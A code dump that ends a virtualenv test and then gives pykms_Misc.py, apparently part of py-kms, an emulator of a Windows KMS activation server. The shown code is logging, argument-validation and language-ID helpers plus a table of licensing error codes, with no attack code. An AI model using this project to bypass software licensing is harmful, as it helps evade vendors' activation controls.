    base_prefix = session.creator.pyenv_cfg["base-prefix"]
    base_exec_prefix = session.creator.pyenv_cfg["base-exec-prefix"]
    old_prefixes = site.PREFIXES
    site.PREFIXES = [base_prefix, base_exec_prefix]
    try:
        system_site_packages = site.getsitepackages()
    finally:
        # Restore the module-level global even if getsitepackages() raises,
        # otherwise later tests would observe the patched PREFIXES.
        site.PREFIXES = old_prefixes
    return system_site_packages
def test_get_site_packages(tmp_path):
    """The venv's purelib and platlib both appear in its site.getsitepackages()."""
    case_sensitive = fs_is_case_sensitive()
    session = cli_run([ensure_text(str(tmp_path))])
    env_site_packages = [str(session.creator.purelib), str(session.creator.platlib)]
    out = subprocess.check_output(
        [str(session.creator.exe), "-c", r"import site; print(site.getsitepackages())"],
        universal_newlines=True,
    )
    site_packages = ast.literal_eval(out)
    if not case_sensitive:
        # Compare case-insensitively on case-insensitive file systems.
        env_site_packages = [entry.lower() for entry in env_site_packages]
        site_packages = [entry.lower() for entry in site_packages]
    for entry in env_site_packages:
        assert entry in site_packages
|
pykms_Misc.py | #!/usr/bin/env python3
import sys
import logging
import os
import argparse
from logging.handlers import RotatingFileHandler
from pykms_Format import ColorExtraMap, ShellMessage, pretty_printer
#------------------------------------------------------------------------------------------------------------------------------------------------------------
# https://stackoverflow.com/questions/2183233/how-to-add-a-custom-loglevel-to-pythons-logging-facility
# https://stackoverflow.com/questions/17558552/how-do-i-add-custom-field-to-python-log-format-string
# https://stackoverflow.com/questions/1343227/can-pythons-logging-format-be-modified-depending-on-the-message-log-level
# https://stackoverflow.com/questions/14844970/modifying-logging-message-format-based-on-message-logging-level-in-python3
def add_logging_level(levelName, levelNum, methodName = None):
    """Register a custom level with the ``logging`` module and the active logger class.

    After the call, ``levelName`` is an attribute of ``logging`` with the value
    ``levelNum``, and ``methodName`` (default ``levelName.lower()``) is available
    both as ``logging.<methodName>()`` and on ``logging.getLoggerClass()``.
    If any of those names is already defined, the function quietly does nothing,
    so repeated registration is safe.

    Example
    -------
    >>> add_logging_level('TRACE', logging.DEBUG - 5)
    >>> logging.getLogger(__name__).setLevel("TRACE")
    >>> logging.getLogger(__name__).trace('that worked')
    >>> logging.trace('so did this')
    >>> logging.TRACE
    5
    """
    methodName = methodName or levelName.lower()

    already_defined = (
        hasattr(logging, levelName)
        or hasattr(logging, methodName)
        or hasattr(logging.getLoggerClass(), methodName)
    )
    if already_defined:
        return

    def log_for_level(self, message, *args, **kwargs):
        # Instance method attached to the logger class below.
        if self.isEnabledFor(levelNum):
            self._log(levelNum, message, args, **kwargs)

    def log_to_root(message, *args, **kwargs):
        # Module-level convenience wrapper, mirrors logging.debug/info/etc.
        logging.log(levelNum, message, *args, **kwargs)

    logging.addLevelName(levelNum, levelName)
    setattr(logging, levelName, levelNum)
    setattr(logging.getLoggerClass(), methodName, log_for_level)
    setattr(logging, methodName, log_to_root)
class LevelFormatter(logging.Formatter):
    """Formatter that selects a format string per log level.

    Levels not present in the configured mapping fall back to a plain
    ``%(message)s`` formatter. With ``color = True`` the format strings are
    wrapped in the ANSI escape codes provided by ``ColorExtraMap``.
    """
    dfmt = '%a, %d %b %Y %H:%M:%S'
    default_fmt = logging.Formatter('%(message)s', datefmt = dfmt)

    def __init__(self, formats, color = False):
        """ `formats` is a dict { loglevel : logformat } """
        # NOTE(review): logging.Formatter.__init__ is intentionally not called;
        # format() below always delegates to a per-level formatter.
        self.formatters = {}
        for loglevel in formats:
            if color:
                template = self.colorize(formats, loglevel)
                formats[loglevel] = template.format(**ColorExtraMap)
            self.formatters[loglevel] = logging.Formatter(formats[loglevel], datefmt = self.dfmt)

    def colorize(self, formats, loglevel):
        # Map each level to its escape-code prefix; anything else only gets
        # the reset code. logging.MINI is the custom level registered by
        # logger_create() via add_logging_level().
        prefixes = {
            logging.MINI: '{gray}',
            logging.CRITICAL: '{magenta}{bold}',
            logging.ERROR: '{red}{bold}',
            logging.WARNING: '{yellow}{bold}',
            logging.INFO: '{cyan}',
            logging.DEBUG: '{green}',
        }
        return prefixes.get(loglevel, '{end}') + formats[loglevel] + '{end}'

    def format(self, record):
        formatter = self.formatters.get(record.levelno, self.default_fmt)
        return formatter.format(record)
# based on https://github.com/jruere/multiprocessing-logging (license LGPL-3.0)
from multiprocessing import Queue as MPQueue
import queue as Queue
import threading
class MultiProcessingLogHandler(logging.Handler):
    """Handler that funnels records from multiple processes through one queue.

    ``emit`` serializes records onto a multiprocessing queue; a daemon thread
    drains the queue and forwards each record to the wrapped ``handler``, so
    the underlying handler only ever runs in one thread of one process.
    """
    def __init__(self, name, handler = None):
        super(MultiProcessingLogHandler, self).__init__()
        # Unbounded queue shared with child processes.
        self.queue = MPQueue(-1)
        if handler is None:
            handler = logging.StreamHandler()
        self.handler = handler
        self.name = handler.name
        # Mirror the wrapped handler's level/formatter/filters on this facade.
        self.setLevel(self.handler.level)
        self.setFormatter(self.handler.formatter)
        self.filters = self.handler.filters

        self.is_closed = False
        self.receive_thread = threading.Thread(target = self.receive, name = name)
        self.receive_thread.daemon = True
        self.receive_thread.start()

    def setFormatter(self, fmt):
        # Keep the facade and the wrapped handler's formatter in sync.
        super(MultiProcessingLogHandler, self).setFormatter(fmt)
        self.handler.setFormatter(fmt)

    def emit(self, record):
        try:
            # Render %-args and drop exc_info before queueing: exception info
            # is not picklable, but the text cached by format() is.
            if record.args:
                record.msg = record.msg %record.args
                record.args = None
            if record.exc_info:
                dummy = self.format(record)
                record.exc_info = None
            self.queue.put_nowait(record)
        except (KeyboardInterrupt, SystemExit):
            raise
        except:
            self.handleError(record)

    def receive(self):
        """Drain the queue until close() has been called and the queue is empty."""
        while not (self.is_closed and self.queue.empty()):
            try:
                record = self.queue.get(timeout = 0.2)
                self.handler.emit(record)
            except (KeyboardInterrupt, SystemExit):
                raise
            except EOFError:
                break
            except Queue.Empty:
                # Timed out: loop again so a close() can be observed.
                pass
            except:
                logging.exception('Error in log handler.')
        self.queue.close()
        self.queue.join_thread()

    def close(self):
        if not self.is_closed:
            self.is_closed = True
            # Give the drain thread a bounded chance to flush pending records.
            self.receive_thread.join(5.0)
            self.handler.close()
            super(MultiProcessingLogHandler, self).close()
def logger_create(log_obj, config, mode = 'a'):
    """Configure *log_obj* with handlers and formatters derived from *config*.

    ``config`` must provide 'logfile' (a list of STDOUT/FILESTDOUT/STDOUTOFF/
    FILEOFF markers and/or a file path), 'logsize' (rotation size factor),
    'loglevel' and 'asyncmsg'. Registers the custom MINI level above CRITICAL.
    """
    # Create new level.
    add_logging_level('MINI', logging.CRITICAL + 10)
    log_handlers = []
    # Configure visualization.
    if any(opt in ['STDOUT', 'FILESTDOUT', 'STDOUTOFF'] for opt in config['logfile']):
        if any(opt in ['STDOUT', 'FILESTDOUT'] for opt in config['logfile']):
            # STDOUT or FILESTDOUT.
            hand_stdout = logging.StreamHandler(sys.stdout)
            hand_stdout.name = 'LogStdout'
            log_handlers.append(hand_stdout)
        if any(opt in ['STDOUTOFF', 'FILESTDOUT'] for opt in config['logfile']):
            # STDOUTOFF or FILESTDOUT: rotate the file given after the marker.
            hand_rotate = RotatingFileHandler(filename = config['logfile'][1], mode = mode, maxBytes = int(config['logsize'] * 1024 * 512),
                                              backupCount = 1, encoding = None, delay = 0)
            hand_rotate.name = 'LogRotate'
            log_handlers.append(hand_rotate)
    elif 'FILEOFF' in config['logfile']:
        # Discard everything.
        hand_null = logging.FileHandler(os.devnull)
        hand_null.name = 'LogNull'
        log_handlers.append(hand_null)
    else:
        # FILE.
        hand_rotate = RotatingFileHandler(filename = config['logfile'][0], mode = mode, maxBytes = int(config['logsize'] * 1024 * 512),
                                          backupCount = 1, encoding = None, delay = 0)
        hand_rotate.name = 'LogRotate'
        log_handlers.append(hand_rotate)
    # Configure formattation.
    try:
        # Python 3 private name.
        levelnames = logging._levelToName
    except AttributeError:
        # Python 2 fallback.
        levelnames = logging._levelNames
    levelnum = [k for k in levelnames if k != 0]
    frmt_gen = '%(asctime)s %(levelname)-8s %(message)s'
    frmt_std = '%(name)s %(asctime)s %(levelname)-8s %(message)s'
    frmt_min = '[%(asctime)s] [%(levelname)-8s] %(host)s %(status)s %(product)s %(message)s'

    def apply_formatter(levelnum, formats, handler, color = False):
        # MINI (CRITICAL + 10) gets the minimal format, all other levels the
        # standard one.
        levelformdict = {}
        for num in levelnum:
            if num != logging.CRITICAL + 10:
                levelformdict[num] = formats[0]
            else:
                levelformdict[num] = formats[1]
        handler.setFormatter(LevelFormatter(levelformdict, color = color))
        return handler

    # Clear old handlers.
    if log_obj.handlers:
        log_obj.handlers = []
    for log_handler in log_handlers:
        log_handler.setLevel(config['loglevel'])
        if log_handler.name in ['LogStdout']:
            log_handler = apply_formatter(levelnum, (frmt_std, frmt_min), log_handler, color = True)
        elif log_handler.name in ['LogRotate']:
            log_handler = apply_formatter(levelnum, (frmt_gen, frmt_min), log_handler)
        # Attach (optionally wrapped for cross-process async logging).
        if config['asyncmsg']:
            log_obj.addHandler(MultiProcessingLogHandler('Thread-AsyncMsg{0}'.format(log_handler.name), handler = log_handler))
        else:
            log_obj.addHandler(log_handler)
    log_obj.setLevel(config['loglevel'])
#------------------------------------------------------------------------------------------------------------------------------------------------------------
def check_logfile(optionlog, defaultlog, where):
    """Validate the `-F/--logfile` option and return it normalized to a list.

    Accepts either a bare value or a list of at most two values (a mode marker
    such as FILESTDOUT/STDOUTOFF plus a path). Exits via pretty_printer() on
    any invalid combination, missing directory or wrong extension.
    """
    if not isinstance(optionlog, list):
        optionlog = [optionlog]
    lenopt = len(optionlog)

    msg_dir = "{reverse}{red}{bold}argument `-F/--logfile`: invalid directory: '%s'. Exiting...{end}"
    msg_long = "{reverse}{red}{bold}argument `-F/--logfile`: too much arguments. Exiting...{end}"
    msg_log = "{reverse}{red}{bold}argument `-F/--logfile`: not a log file, invalid extension: '%s'. Exiting...{end}"

    def checkdir(path):
        # Reject paths whose directory does not exist or whose name is not *.log.
        filename = os.path.basename(path)
        pathname = os.path.dirname(path)
        if not os.path.isdir(pathname):
            if path.count('/') == 0:
                pathname = filename
            pretty_printer(put_text = msg_dir %pathname, where = where, to_exit = True)
        elif not filename.lower().endswith('.log'):
            pretty_printer(put_text = msg_log %filename, where = where, to_exit = True)

    if lenopt > 2:
        pretty_printer(put_text = msg_long, where = where, to_exit = True)

    needs_companion_file = any(opt in ['FILESTDOUT', 'STDOUTOFF'] for opt in optionlog)
    if needs_companion_file:
        if lenopt == 1:
            # add default logfile.
            optionlog.append(defaultlog)
        elif lenopt == 2:
            # check directory path.
            checkdir(optionlog[1])
    elif lenopt == 2:
        pretty_printer(put_text = msg_long, where = where, to_exit = True)
    elif lenopt == 1 and any(opt not in ['STDOUT', 'FILEOFF'] for opt in optionlog):
        # check directory path.
        checkdir(optionlog[0])
    return optionlog
#------------------------------------------------------------------------------------------------------------------------------------------------------------
# Valid language identifiers to be used in the EPID (see "kms.c" in vlmcsd)
# NOTE(review): appears to mirror the LCID table from vlmcsd's "kms.c" (see the
# comment above); rows seem grouped in 1024-wide sublanguage bands — confirm
# against the upstream table before editing.
ValidLcid = [1025, 1026, 1027, 1028, 1029,
             1030, 1031, 1032, 1033, 1034, 1035, 1036, 1037, 1038, 1039,
             1040, 1041, 1042, 1043, 1044, 1045, 1046, 1048, 1049,
             1050, 1051, 1052, 1053, 1054, 1056, 1057, 1058, 1059,
             1060, 1061, 1062, 1063, 1065, 1066, 1067, 1068, 1069,
             1071, 1074, 1076, 1077, 1078, 1079,
             1080, 1081, 1082, 1083, 1086, 1087, 1088, 1089,
             1091, 1092, 1093, 1094, 1095, 1097, 1098, 1099,
             1100, 1102, 1103, 1104, 1106, 1110, 1111, 1114, 1125, 1131, 1153,
             2049, 2052, 2055, 2057, 2058, 2060, 2064, 2067, 2068, 2070, 2074, 2077, 2092, 2107, 2110, 2115, 2155,
             3073, 3076, 3079, 3081, 3082, 3084, 3098, 3131, 3179,
             4097, 4100, 4103, 4105, 4106, 4108, 4122, 4155,
             5121, 5124, 5127, 5129, 5130, 5132, 5146, 5179,
             6145, 6153, 6154, 6156, 6170, 6203,
             7169, 7177, 7178, 7194, 7227,
             8193, 8201, 8202, 8251,
             9217, 9225, 9226, 9275,
             10241, 10249, 10250, 11265, 11273, 11274, 12289, 12297, 12298,
             13313, 13321, 13322, 14337, 14346, 15361, 15370, 16385, 16394, 17418, 18442, 19466, 20490]
# http://stackoverflow.com/questions/3425294/how-to-detect-the-os-default-language-in-python
def check_lcid(lcid, log_obj):
    """Return *lcid* if it is a valid KMS language id, otherwise a best-guess fix.

    Invalid or missing values are replaced with 1033 on CPython, the Windows
    user-default UI language on other 'nt' interpreters, or a locale-derived
    LCID elsewhere; the auto-fix is reported through pretty_printer().
    """
    if lcid and lcid in ValidLcid:
        return lcid
    # Pick a replacement LCID for the invalid input.
    if hasattr(sys, 'implementation') and sys.implementation.name == 'cpython':
        fixlcid = 1033
    elif os.name == 'nt':
        import ctypes
        fixlcid = ctypes.windll.kernel32.GetUserDefaultUILanguage()
    else:
        import locale
        try:
            fixlcid = next(k for k, v in locale.windows_locale.items() if v == locale.getdefaultlocale()[0])
        except StopIteration:
            fixlcid = 1033
    pretty_printer(log_obj = log_obj, put_text = "{reverse}{yellow}{bold}LCID '%s' auto-fixed with LCID '%s'{end}" %(lcid, fixlcid))
    return fixlcid
#------------------------------------------------------------------------------------------------------------------------------------------------------------
class KmsParserException(Exception):
    """Raised for argument-parsing errors instead of exiting, so callers can recover."""
    pass
class KmsParser(argparse.ArgumentParser):
    """ArgumentParser variant that raises instead of printing usage and exiting."""
    def error(self, message):
        # argparse calls error() on bad input; surface it as an exception.
        raise KmsParserException(message)
class KmsParserHelp(object):
    """Pretty-prints help for the base parser and (optionally) its subparsers."""

    def replace(self, parser, replace_epilog_with):
        # Return parser help as a list of lines, dropping the description line
        # and substituting the epilog line with `replace_epilog_with`.
        help_list = []
        for line in parser.format_help().splitlines():
            if line == parser.description:
                continue
            if line == parser.epilog:
                line = replace_epilog_with
            help_list.append(line)
        return help_list

    def printer(self, parsers):
        if len(parsers) == 3:
            parser_base, parser_adj, parser_sub = parsers
            replace_epilog_with = 80 * '*' + '\n'
        elif len(parsers) == 1:
            parser_base = parsers[0]
            replace_epilog_with = ''
        print('\n' + parser_base.description)
        print(len(parser_base.description) * '-' + '\n')
        for line in self.replace(parser_base, replace_epilog_with):
            print(line)
        try:
            # parser_adj / parser_sub only exist when three parsers were given;
            # the bare except swallows the NameError in the one-parser case.
            print(parser_adj.description + '\n')
            for line in self.replace(parser_sub, replace_epilog_with):
                print(line)
        except:
            pass
        print('\n' + len(parser_base.epilog) * '-')
        print(parser_base.epilog + '\n')
        parser_base.exit()
def kms_parser_get(parser):
    """Split *parser*'s optionals into (zero-argument, one-argument) option lists.

    Returns two lists of `option_strings` lists; positionals and the built-in
    help action are skipped. Plain store actions count as one-argument, every
    other action kind as zero-argument.
    """
    zeroarg, onearg = [], []
    for action in vars(parser)['_actions']:
        if action.option_strings in ([], ['-h', '--help']):
            continue
        bucket = onearg if isinstance(action, argparse._StoreAction) else zeroarg
        bucket.append(action.option_strings)
    return zeroarg, onearg
def kms_parser_check_optionals(userarg, zeroarg, onearg, msg = 'optional py-kms server', exclude_opt_len = []):
    """
    For optionals arguments:
    Don't allow duplicates,
    Don't allow abbreviations,
    Don't allow joining and not existing arguments,
    Checks length values passed to arguments.
    """
    # NOTE(review): the mutable default `exclude_opt_len = []` is only safe
    # because the list is never mutated here.
    # Flatten [['-x', '--xx'], ...] into ['-x', '--xx', ...].
    zeroarg = [item for sublist in zeroarg for item in sublist]
    onearg = [item for sublist in onearg for item in sublist]
    allarg = zeroarg + onearg
    def is_abbrev(allarg, arg_to_check):
        # Reject e.g. `--por` for `--port`: any strict prefix (sharing the
        # first letter after '--') of a known long option raises.
        for opt in allarg:
            if len(opt) > 2 and opt[2] == arg_to_check[2]:
                for indx in range(-1, -len(opt), -1):
                    if opt[:indx] == arg_to_check:
                        raise KmsParserException("%s argument `%s` abbreviation not allowed for `%s`" %(msg, arg_to_check, opt))
        return False
    # Check abbreviations, joining, not existing.
    for arg in userarg:
        if arg not in allarg:
            if arg.startswith('-'):
                if arg == '--' or arg[:2] != '--' or not is_abbrev(allarg, arg):
                    raise KmsParserException("unrecognized %s arguments: `%s`" %(msg, arg))
    # Check duplicates.
    founds = [i for i in userarg if i in allarg]
    dup = [item for item in set(founds) if founds.count(item) > 1]
    if dup != []:
        raise KmsParserException("%s argument `%s` appears several times" %(msg, ', '.join(dup)))
    # Check length.
    elem = None
    for found in founds:
        if found not in exclude_opt_len:
            pos = userarg.index(found)
            try:
                # A zero-arg option must be followed directly by another known
                # option (or nothing); a one-arg option by exactly one value.
                if found in zeroarg:
                    elem = userarg[pos + 1]
                    num = "zero arguments,"
                elif found in onearg:
                    elem = userarg[pos + 2]
                    num = "one argument,"
            except IndexError:
                pass
            if elem and elem not in allarg:
                raise KmsParserException("%s argument `" %msg + found + "`:" + " expected " + num + " unrecognized: '%s'" %elem)
def kms_parser_check_positionals(config, parse_method, arguments = [], force_parse = False, msg = 'positional py-kms server'):
    """Run *parse_method* and merge the parsed namespace into *config*.

    A non-empty `arguments` list (or `force_parse`) selects explicit-argv
    parsing. A KmsParserException about an unrecognized positional is re-raised
    with a clearer message; optional-argument errors propagate unchanged.
    """
    use_argv = bool(arguments) or force_parse
    try:
        parsed = parse_method(arguments) if use_argv else parse_method()
        config.update(vars(parsed))
    except KmsParserException as e:
        text = str(e)
        if text.startswith('argument'):
            raise
        raise KmsParserException("unrecognized %s arguments: '%s'" %(msg, text.split(': ')[1]))
#------------------------------------------------------------------------------------------------------------------------------------------------------------
def proper_none(dictionary):
    """In-place: convert every string value 'None' in *dictionary* to None."""
    # Iterate keys directly (no redundant .keys()); only rewrite matches so
    # unrelated values are never reassigned.
    for key in dictionary:
        if dictionary[key] == 'None':
            dictionary[key] = None
def check_setup(config, options, logger, where):
        """Validate and normalize a parsed py-kms configuration, in place.

        config  -- dict of option values; mutated ('None' strings, logfile,
                   logsize, loglevel may be rewritten).
        options -- option metadata; only options['lfile']['def'] (default
                   logfile) is read here.
        logger  -- logger object handed to logger_create().
        where   -- 'srv' (server) or 'clt' (client); selects which
                   ShellMessage flags to set and tags error output.

        Exits the process (pretty_printer with to_exit=True) on an invalid
        logsize or port.
        """
        # 'None'--> None.
        proper_none(config)
        # Check logfile.
        config['logfile'] = check_logfile(config['logfile'], options['lfile']['def'], where = where)
        # Check logsize (py-kms Gui).
        # NOTE(review): an empty logsize presumably comes from the GUI leaving
        # the field blank — confirm against the GUI caller.
        if config['logsize'] == "":
                if any(opt in ['STDOUT', 'FILEOFF'] for opt in config['logfile']):
                        # No real log file is written, so the size cap is moot:
                        # set a recognized size never used.
                        config['logsize'] = 0
                else:
                        pretty_printer(put_text = "{reverse}{red}{bold}argument `-S/--logsize`: invalid with: '%s'. Exiting...{end}" %config['logsize'],
                                       where = where, to_exit = True)
        # Check loglevel (py-kms Gui).
        if config['loglevel'] == "":
                # set a recognized level never used.
                config['loglevel'] = 'ERROR'
        # Setup hidden / asynchronous messages.
        # Shell output is suppressed whenever logging is already routed to
        # stdout in some form.
        hidden = ['STDOUT', 'FILESTDOUT', 'STDOUTOFF']
        view_flag = (False if any(opt in hidden for opt in config['logfile']) else True)
        if where == 'srv':
                ShellMessage.viewsrv = view_flag
                ShellMessage.asyncmsgsrv = config['asyncmsg']
        elif where == 'clt':
                ShellMessage.viewclt = view_flag
                ShellMessage.asyncmsgclt = config['asyncmsg']
        # Create log (append mode).
        logger_create(logger, config, mode = 'a')
        # Check port: must be a number in the valid TCP range; "" (unset) is
        # rejected here as well.
        if (config['port'] == "") or (not 1 <= config['port'] <= 65535):
                pretty_printer(log_obj = logger.error, where = where, to_exit = True,
                               put_text = "{reverse}{red}{bold}Port number '%s' is invalid. Enter between 1 - 65535. Exiting...{end}" %config['port'])
#------------------------------------------------------------------------------------------------------------------------------------------------------------
# http://joshpoley.blogspot.com/2011/09/hresults-user-0x004.html (slerror.h)
ErrorCodes = {
'SL_E_SRV_INVALID_PUBLISH_LICENSE' : (0xC004B001, 'The activation server determined that the license is invalid.'),
'SL_E_SRV_INVALID_PRODUCT_KEY_LICENSE' : (0xC004B002, 'The activation server determined that the license is invalid.'),
'SL_E_SRV_INVALID_RIGHTS_ACCOUNT_LICENSE' : (0xC004B003, 'The activation server determined that the license is invalid.'),
'SL_E_SRV_INVALID_LICENSE_STRUCTURE' : (0xC004B004, 'The activation server determined that the license is invalid.'),
'SL_E_SRV_AUTHORIZATION_FAILED' : (0xC004B005, 'The activation server determined that the license is invalid.'),
'SL_E_SRV_INVALID_BINDING' : (0xC004B006, 'The activation server determined that the license is invalid.'),
'SL_E_SRV_SERVER_PONG' : (0xC004B007, 'The activation server reported that the computer could not connect to the activation server.'),
'SL_E_SRV_INVALID_PAYLOAD' : (0xC004B008, 'The activation server determined that the product could not be activated.'),
'SL_E_SRV_INVALID_SECURITY_PROCESSOR_LICENSE' : (0xC004B009, 'The activation server determined that the license is invalid.'),
'SL_E_SRV_BUSINESS_TOKEN_ENTRY_NOT_FOUND' : (0xC004B010, 'The activation server determined that required business token entry cannot be found.'),
'SL_E_SRV_CLIENT_CLOCK_OUT_OF_SYNC' : (0xC004B011, 'The activation server determined that your computer clock time is not correct. You must correct your clock before you can activate.'),
'SL_E_SRV_GENERAL_ERROR' : (0xC004B100, 'The activation server determined that the product could not be activated.'),
'SL_E_CHPA_PRODUCT_KEY_OUT_OF_RANGE' : (0xC004C001, 'The activation server determined the specified product key is invalid.'),
'SL_E_CHPA_INVALID_BINDING' : (0xC004C002, 'The activation server determined there is a problem with the specified product key.'),
'SL_E_CHPA_PRODUCT_KEY_BLOCKED' : (0xC004C003, 'The activation server determined the specified product key has been blocked.'),
'SL_E_CHPA_INVALID_PRODUCT_KEY' : (0xC004C004, 'The activation server determined the specified product key is invalid.'),
'SL_E_CHPA_BINDING_NOT_FOUND' : (0xC004C005, 'The activation server determined the license is invalid.'),
'SL_E_CHPA_BINDING_MAPPING_NOT_FOUND' : (0xC004C006, 'The activation server determined the license is invalid.'),
'SL_E_CHPA_UNSUPPORTED_PRODUCT_KEY' : (0xC004C007, 'The activation server determined the specified product key is invalid.'),
'SL_E_CHPA_MAXIMUM_UNLOCK_EXCEEDED' : (0xC004C008, 'The activation server reported that the product key has exceeded its unlock limit.'),
'SL_E_CHPA_ACTCONFIG_ID_NOT_FOUND' : (0xC004C009, 'The activation server determined the license is invalid.'),
'SL_E_CHPA_INVALID_PRODUCT_DATA_ID' : (0xC004C00A, 'The activation server determined the license is invalid.'),
'SL_E_CHPA_INVALID_PRODUCT_DATA' : (0xC004C00B, 'The activation server determined the license is invalid.'),
'SL_E_CHPA_SYSTEM_ERROR' : (0xC004C00C, 'The activation server experienced an error.'),
'SL_E_CHPA_INVALID_ACTCONFIG_ID' : (0xC004C00D, 'The activation server determined the product key is not valid.'),
'SL_E_CHPA_INVALID_PRODUCT_KEY_LENGTH' : (0xC004C00E, 'The activation server determined the specified product key is invalid.'),
'SL_E_CHPA_INVALID_PRODUCT_KEY_FORMAT' : (0xC004C00F, 'The activation server determined the specified product key is invalid.'),
'SL_E_CHPA_INVALID_PRODUCT_KEY_CHAR' : (0xC004C010, 'The activation server determined the specified product key is invalid.'),
'SL_E_CHPA_INVALID_BINDING_URI' : (0xC004C011, 'The activation server determined the license is invalid.'),
'SL_E_CHPA_NETWORK_ERROR' : (0xC004C012, 'The activation server experienced a network error.'),
'SL_E_CHPA_DATABASE_ERROR' : (0xC004C013, 'The activation server experienced an error.'),
'SL_E_CHPA_INVALID_ARGUMENT' : (0xC004C014, 'The activation server experienced an error.'),
'SL_E_CHPA_RESPONSE_NOT_AVAILABLE' : (0xC004C015, 'The activation server experienced an error.'),
'SL_E_CHPA_OEM_SLP_COA0' : (0xC004C016, 'The activation server reported that the specified product key cannot be used for online activation.'),
'SL_E_CHPA_PRODUCT_KEY_BLOCKED_IPLOCATION' : (0xC004C017, 'The activation server determined the specified product key has been blocked for this geographic location.'),
'SL_E_CHPA_DMAK_LIMIT_EXCEEDED' : (0xC004C020, 'The activation server reported that the Multiple Activation Key has exceeded its limit.'),
'SL_E_CHPA_DMAK_EXTENSION_LIMIT_EXCEEDED' : (0xC004C021, 'The activation server reported that the Multiple Activation Key extension limit has been exceeded.'),
'SL_E_CHPA_REISSUANCE_LIMIT_NOT_FOUND' : (0xC004C022, 'The activation server reported that the re-issuance limit was not found.'),
'SL_E_CHPA_OVERRIDE_REQUEST_NOT_FOUND' : (0xC004C023, 'The activation server reported that the override request was not found.'),
'SL_E_CHPA_TIMEBASED_ACTIVATION_BEFORE_START_DATE' : (0xC004C030, 'The activation server reported that time based activation attempted before start date.'),
'SL_E_CHPA_TIMEBASED_ACTIVATION_AFTER_END_DATE' : (0xC004C031, 'The activation server reported that time based activation attempted after end date.'),
'SL_E_CHPA_TIMEBASED_ACTIVATION_NOT_AVAILABLE' : (0xC004C032, 'The activation server reported that new time based activation is not available.'),
'SL_E_CHPA_TIMEBASED_PRODUCT_KEY_NOT_CONFIGURED' : (0xC004C033, 'The activation server reported that the time based product key is not configured for activation.'),
'SL_E_CHPA_NO_RULES_TO_ACTIVATE' : (0xC004C04F, 'The activation server reported that no business rules available to activate specified product key.'),
'SL_E_CHPA_GENERAL_ERROR' : (0xC004C050, 'The activation server experienced a general error.'),
'SL_E_CHPA_DIGITALMARKER_INVALID_BINDING' : (0xC004C051, 'The activation server determined the license is invalid.'),
'SL_E_CHPA_DIGITALMARKER_BINDING_NOT_CONFIGURED' : (0xC004C052, 'The activation server determined there is a problem with the specified product key.'),
'SL_E_CHPA_DYNAMICALLY_BLOCKED_PRODUCT_KEY' : (0xC004C060, 'The activation server determined the specified product key has been blocked.'),
'SL_E_INVALID_LICENSE_STATE_BREACH_GRACE' : (0xC004C291, 'Genuine Validation determined the license state is invalid.'),
'SL_E_INVALID_LICENSE_STATE_BREACH_GRACE_EXPIRED' : (0xC004C292, 'Genuine Validation determined the license state is invalid.'),
'SL_E_INVALID_TEMPLATE_ID' : (0xC004C2F6, 'Genuine Validation determined the validation input template identifier is invalid.'),
'SL_E_INVALID_XML_BLOB' : (0xC004C2FA, 'Genuine Validation determined the validation input data blob is invalid.'),
'SL_E_VALIDATION_BLOB_PARAM_NOT_FOUND' : (0xC004C327, 'Genuine Validation determined the validation input data blob parameter is invalid.'),
'SL_E_INVALID_CLIENT_TOKEN' : (0xC004C328, 'Genuine Validation determined the client token data is invalid.'),
'SL_E_INVALID_OFFLINE_BLOB' : (0xC004C329, 'Genuine Validation determined the offline data blob is invalid.'),
'SL_E_OFFLINE_VALIDATION_BLOB_PARAM_NOT_FOUND' : (0xC004C32A, 'Genuine Validation determined the offline data blob parameter is invalid.'),
'SL_E_INVALID_OSVERSION_TEMPLATEID' : (0xC004C32B, 'Genuine Validation determined the validation template identifier is invalid for this version of the Windows operating system.'),
'SL_E_OFFLINE_GENUINE_BLOB_REVOKED' : (0xC004C32C, 'Genuine Validation determined the offline genuine blob is revoked.'),
'SL_E_OFFLINE_GENUINE_BLOB_NOT_FOUND' : (0xC004C32D, 'Genuine Validation determined the offline genuine blob is not found.'),
'SL_E_CHPA_MSCH_RESPONSE_NOT_AVAILABLE_VGA' : (0xC004C3FF, 'The activation server determined the VGA service response is not available in the expected format.'),
'SL_E_INVALID_OS_FOR_PRODUCT_KEY' : (0xC004C401, 'Genuine Validation determined the product key is invalid for this version of the Windows operating system.'),
'SL_E_INVALID_FILE_HASH' : (0xC004C4A1, 'Genuine Validation determined the file hash is invalid.'),
'SL_E_VALIDATION_BLOCKED_PRODUCT_KEY' : (0xC004C4A2, 'Genuine Validation determined the product key has been blocked.'),
'SL_E_MISMATCHED_KEY_TYPES' : (0xC004C4A4, 'Genuine Validation determined the product key type is invalid.'),
'SL_E_VALIDATION_INVALID_PRODUCT_KEY' : (0xC004C4A5, 'Genuine Validation determined the product key is invalid.'),
'SL_E_INVALID_OEM_OR_VOLUME_BINDING_DATA' : (0xC004C4A7, 'Genuine Validation determined the OEM or Volume binding data is invalid.'),
'SL_E_INVALID_LICENSE_STATE' : (0xC004C4A8, 'Genuine Validation determined the license state is invalid.'),
'SL_E_IP_LOCATION_FALIED' : (0xC004C4A9, 'Genuine Validation determined the specified product key has been blocked for this geographic location.'),
'SL_E_SOFTMOD_EXPLOIT_DETECTED' : (0xC004C4AB, 'Genuine Validation detected Windows licensing exploits.'),
'SL_E_INVALID_TOKEN_DATA' : (0xC004C4AC, 'Genuine Validation determined the token activation data is invalid.'),
'SL_E_HEALTH_CHECK_FAILED_NEUTRAL_FILES' : (0xC004C4AD, 'Genuine Validation detected tampered Windows binaries.'),
'SL_E_HEALTH_CHECK_FAILED_MUI_FILES' : (0xC004C4AE, 'Genuine Validation detected tampered Windows binaries.'),
'SL_E_INVALID_AD_DATA' : (0xC004C4AF, 'Genuine Validation determined the active directory activation data is invalid.'),
'SL_E_INVALID_RSDP_COUNT' : (0xC004C4B0, 'Genuine Validation detected Windows licensing exploits.'),
'SL_E_ENGINE_DETECTED_EXPLOIT' : (0xC004C4B1, 'Genuine Validation detected Windows licensing exploits.'),
'SL_E_NOTIFICATION_BREACH_DETECTED' : (0xC004C531, 'Genuine Validation detected Windows licensing exploits.'),
'SL_E_NOTIFICATION_GRACE_EXPIRED' : (0xC004C532, 'Genuine Validation determined the license state is in notification due to expired grace.'),
'SL_E_NOTIFICATION_OTHER_REASONS' : (0xC004C533, 'Genuine Validation determined the license state is in notification.'),
'SL_E_NON_GENUINE_STATUS_LAST' : (0xC004C600, 'Genuine Validation determined your copy of Windows is not genuine.'),
